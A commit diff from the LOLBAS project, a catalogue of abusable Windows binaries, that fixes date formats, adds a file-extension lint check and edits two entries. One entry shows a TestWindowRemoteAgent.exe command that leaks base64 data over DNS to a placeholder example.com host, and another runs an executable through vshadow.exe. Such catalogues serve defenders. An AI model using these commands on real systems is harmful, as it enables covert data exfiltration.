Merge pull request #330 from LOLBAS-Project/fix/incorrect_date

Enforcing YYYY-MM-DD format for dates (fixes #328)
2024-12-27 07:18:05 +01:00 · 2023-10-03 15:03:23 -04:00 · 2023-10-03 15:03:23 -04:00 · 90f666e7a0
commit 90f666e7a0
parent f55d9d1131 b3951952b0
4 changed files with 8 additions and 4 deletions
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@ -4,9 +4,12 @@ on: [push,pull_request]

 jobs:
  lintFiles:
+    if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
+      - name: Check file extensions
+        run: if [[ $(find "${GITHUB.WORKSPACE}/yml" -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi
      - name: yaml-lint
        uses: ibiqlik/action-yamllint@v3
        with:
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@ -26,6 +26,7 @@ mapping:
    required: true
  "Created":
    type: date
+    format: '%Y-%M-%d'
    required: true
  "Commands":
    type: seq
--- a/yml/OtherMSBinaries/testwindowremoteagent.yaml
+++ b/yml/OtherMSBinaries/testwindowremoteagent.yaml
@ -2,12 +2,12 @@
 Name: TestWindowRemoteAgent.exe
 Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
 Author: Onat Uzunyayla
-Created: 2023-21-08 
+Created: 2023-08-21
 Commands:
  - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
    Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
    Usecase: Attackers may utilize this to exfiltrate data over DNS
-    Category: Data Exfiltration
+    Category: Upload
    Privileges: User
    MitreID: T1048
    OperatingSystem: Windows 10, Windows 11
--- a/yml/OtherMSBinaries/vshadow.yaml
+++ b/yml/OtherMSBinaries/vshadow.yaml
@ -1,10 +1,10 @@
 ---
-Name: vshadow.exe
+Name: Vshadow.exe
 Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
 Author: Ayberk Halaç
 Created: 2023-09-06
 Commands:
-  - Command: vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:
+  - Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:'
    Description: Executes calc.exe from vshadow.exe.
    Usecase: Performs execution of specified executable file.
    Category: Execute